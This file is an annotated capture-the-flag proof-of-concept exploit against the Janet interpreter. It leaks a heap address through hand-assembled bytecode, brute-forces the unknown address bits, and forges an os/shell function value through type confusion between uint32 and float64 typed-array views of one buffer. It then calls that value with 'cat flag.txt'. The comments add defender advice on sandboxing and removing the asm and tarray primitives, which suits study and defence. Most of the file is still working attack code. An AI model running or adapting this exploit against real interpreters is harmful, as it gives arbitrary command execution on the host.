# CTF proof-of-concept against a Janet interpreter. Read as a whole, the script
# leaks a heap address from an array value, derives a candidate address for
# os/shell from it, forges a function value by writing raw words through one
# typed-array view and reading them back through a float64 view of the same
# buffer, and finally calls the forged value.
#
# Defender's reading: the two primitives it depends on are `asm` (hand-written
# bytecode accepted without the usual compiler checks) and `tarray` views of
# different element widths sharing one backing buffer. An interpreter that
# evaluates untrusted source with these available must be treated as granting
# full host access; confine such evaluation to a sandbox with no secrets
# reachable, and keep the runtime current.
#
# `some`: a zero-arity function assembled from raw bytecode. Its constant pool
# is "blah" and `print`; the bytecode loads the function itself into slot 0
# (lds 0), loads constant 0 into slot 1 and pushes it (ldc 1 0, push 1),
# overwrites slot 1 with constant 1 (ldc 1 1), builds an array from the pushed
# value(s) into slot 2 (mkarr 2) and returns it (ret 2).
# NOTE(review): what the returned array actually holds, and why `describe` of
# it yields a string containing an address, depends on how the assembler and
# VM handle this sequence — inferred from the parsing that follows, not shown.
(def some
(asm
'{
constants @["blah" print]
:arity 0
slotcount 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
# Stage 1: turn the value returned by the assembled function into numbers.
# `describe` renders it as a string; `string/trim` with the character set
# "<>array " strips '<', '>', 'a', 'r', 'y' and space from both ends, so the
# expected rendering is of the form "<array 0x…>" and what remains is "0x…"
# followed by the hex address (assumption — not visible here, but the slice
# offsets below only make sense for a 12-hex-digit address after "0x").
(def- leak_tup (some))
(print leak_tup)
(def- leak_str (describe leak_tup))
(def leak_addr (string/trim leak_str "<>array "))
# Split the 12 hex digits into the upper 4 (chars 2..6) and lower 8 (6..14).
(def leak_addr1 (string/slice leak_addr 2 6))
(def leak_addr2 (string/slice leak_addr 6 14))
(def hex_p "0x")
(print leak_addr)
(print leak_addr1)
(print leak_addr2)
# Re-prefix each half with "0x" so `scan-number` parses it as hexadecimal.
(def leak_addr2h (string/join [hex_p leak_addr2]))
(def leak_addr1h (string/join [hex_p leak_addr1]))
(print leak_addr2h)
(print leak_addr1h)
(def leak_addr2i (scan-number leak_addr2h))
(def leak_addr1i (scan-number leak_addr1h))
# 387504 is a fixed offset from the leaked object to what the author labels
# "heapbase" below; it is specific to the build the PoC was written against.
(def leak_program_ptr2 (- leak_addr2i 387504))
# leak_program_ptr1 is only printed; nothing below reads it.
(def leak_program_ptr1 (bor 0xfffe8000 leak_addr1i))
(print leak_program_ptr1)
# `buffer` is the 8-byte backing store that the two typed-array views in the
# brute-force loop share — the type-confusion primitive of this PoC.
(def- buffer (tarray/buffer 8))
(def- buffleak2 (buffer/new 16))
# progleak is allocated but never referenced afterwards.
(def- progleak (buffer/new 16))
# Recombine upper 16 bits and adjusted lower 32 bits into one hex string.
(buffer/format buffleak2 "0x%x%x" leak_addr1i leak_program_ptr2)
(print "heapbase")
(print buffleak2)
# heapbase leaked, now lets brute the program base and eventually the os/shell
# Keep the first 5 hex digits (chars 2..7) and the last 3 (chars 11..14) of the
# heap-base string; the 4 digits in between are the unknown the loop below
# enumerates (0x0000..0xFFFF).
(def leak_pre (string/slice buffleak2 2 7))
(def leak_suf (string/slice buffleak2 11 14))
(def leak_preh (string/join [hex_p leak_pre]))
(def leak_sufh (string/join [hex_p leak_suf]))
(def leak_prei (scan-number leak_preh))
(def leak_sufi (scan-number leak_sufh))
# Stage 2: brute-force the unknown middle 16 bits of the address, forge a
# function value for each candidate, and stop at the first one whose
# description mentions "shell".
# Detection note for defenders: the tell here is a script that creates two
# typed-array views of different element widths over one buffer, writes words
# through the integer view and reads them back through the float view, then
# calls the result. Not exposing `tarray`/`asm` to untrusted input, or
# evaluating such input only inside a confined process, removes the primitive.
# `found` stays nil until a candidate matches; it holds the `string/find`
# index afterwards.
(var found nil)
(loop [leak_mid :range [0x0 0xFFFF]
:until (not= found nil)
]
# brute leak mid and try to generate possible addresses for os/shell
# Candidate = 5-digit prefix, 4-digit zero-padded mid, 3-digit zero-padded
# suffix — 12 hex digits after "0x".
(def- buffleak3 (buffer/new 16))
(buffer/format buffleak3 "0x%x%.4x%.3x" leak_prei leak_mid leak_sufi)
# Upper 6 hex digits (chars 2..8) and lower 6 (8..14), parsed separately.
(def leak_prog_1 (string/slice buffleak3 2 8))
(def leak_prog_1h (string/join [hex_p leak_prog_1]))
(def leak_prog_1i (scan-number leak_prog_1h))
(def leak_prog_2 (string/slice buffleak3 8 14))
(def leak_prog_2h (string/join [hex_p leak_prog_2]))
(def leak_prog_2i (scan-number leak_prog_2h))
# Fixed offset from the candidate program base to os/shell, per the author's
# note; build-specific like the heap offset above.
(def leak_prog_2f (+ leak_prog_2i 127456)) # os_shell = progbase + 127456
(def leak_prog_f (buffer/new 16))
(buffer/format leak_prog_f "0x%x%.6x" leak_prog_1i leak_prog_2f)
# now convert the address into buffer-float-view to create a forged function pointer
# Same 4 + 8 digit split as in stage 1.
(def leak_prog_addr1 (string/slice leak_prog_f 2 6))
(def leak_prog_addr2 (string/slice leak_prog_f 6 14))
# Redefines hex_p with the same value "0x" already bound above; redundant.
(def hex_p "0x")
(def leak_prog_addr2h (string/join [hex_p leak_prog_addr2]))
(def leak_prog_addr1h (string/join [hex_p leak_prog_addr1]))
(def leak_prog_addr2i (scan-number leak_prog_addr2h))
(def leak_prog_addr1i (scan-number leak_prog_addr1h))
(def- leak_prog_ptr1e (buffer/new 8))
# Set bit 15 of the upper 16 bits, then prepend 0xfffe to form the full
# 32-bit high word. NOTE(review): 0xfffe… presumably is the NaN-boxing tag
# that makes the 64-bit pattern read as a function value — inferred, the
# tag layout is not visible here.
(def leak_prog_addr1ie (bor 0x8000 leak_prog_addr1i))
(def- leak_prog_part1 (scan-number (buffer/format leak_prog_ptr1e "0x%x%x" 0xfffe leak_prog_addr1ie)))
# Two views over the same 8-byte `buffer`: one float64 element and two
# uint32 elements (arguments: element type, count, stride, offset, buffer).
(def- buffer-float64-view (tarray/new :float64 1 1 0 buffer))
(def- buffer-uint32-view (tarray/new :uint32 2 1 0 buffer))
# Write high word at uint32 index 1 and low word at index 0 — assumes a
# little-endian host so that index 1 holds the upper half of the 64-bit value.
(set (buffer-uint32-view 1) leak_prog_part1)
(set (buffer-uint32-view 0) leak_prog_addr2i)
# Reading the float64 element hands the 8 raw bytes back as a Janet value; the
# PoC relies on that value being the boxed pattern written above rather than a
# plain number. A description containing "shell" means the candidate resolved
# to the os/shell function.
(set found (string/find "shell" (describe (buffer-float64-view 0))))
# On a match, the forged value is invoked directly with a shell command.
(if (not= found nil)
((buffer-float64-view 0) "cat flag.txt")
)
)